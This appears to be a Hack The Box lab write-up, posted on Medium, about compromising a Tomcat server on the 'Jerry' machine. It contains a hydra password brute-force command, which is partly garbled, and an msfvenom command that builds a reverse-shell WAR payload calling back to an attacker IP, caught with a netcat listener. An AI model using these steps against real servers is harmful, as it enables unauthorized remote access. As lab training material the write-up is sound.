Hackthebox writeup for Jerry

Mind Opener

What are war files ? If an application allows us to upload such a file, then can we create such a file and obtain a reverse shell through it ?

Reconnaissance

Nmap scan reveals that it’s an apache tomcat web server.

Tomcat is a web server for hosting java files.

Login to the application and click on server status, it asks for authentication. The default credential “admin admin” works,

Next, we click on Manager => List Applications, we get access denied.

In order to find out why we are getting access denied error we will use burpsuite.

If we send the authorization header to decoder, it turns out that the application is trying to login with admin admin. If you remove the header and forward the request it works !

Exploitation

We’ll try to bruteforce for the password with hydra and seclist as the wordlist.

find . | grep -i tomcatHydra -C /usr/share/seclists/Passwords/../../betterdefaultpassists.txt http- get://10.10.10.95:8080/manager/html

Password is, tomcat:secret

This provides us access to the application. There’s an option to upload a war file ! Can we use this kind of file upload for getting reverse shell ?

What is a war file

A WAR file (Web Application Resource or Web application ARchive) is a file used to distribute a collection of Jar-files, Java Server Pages, Java Servlets, Java Classes, XML files and other resources that together constitute a web application.

Turns out that we can create such war files with msfvenom, not only that but we can create payloads of various other forms using msfvenom, below is the list from offsec page,

root@kali:~# msfvenom --help-formats Executable formatsasp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript

Create a msfvenom payload using below command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4455 -f war > shell.war

Set up netcat listener

nc -nlvp 4455

Browse the file from browser

Obtain reverse shell :

The whoami command here returns an output that we can be very happy about. We are already root !

So, just grab the flag

Skills that I learnt from this machine

To use burpsuite for troubleshooting.

To create a jsp shell using msfvenom in war format and obtain a reverse shell from it.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store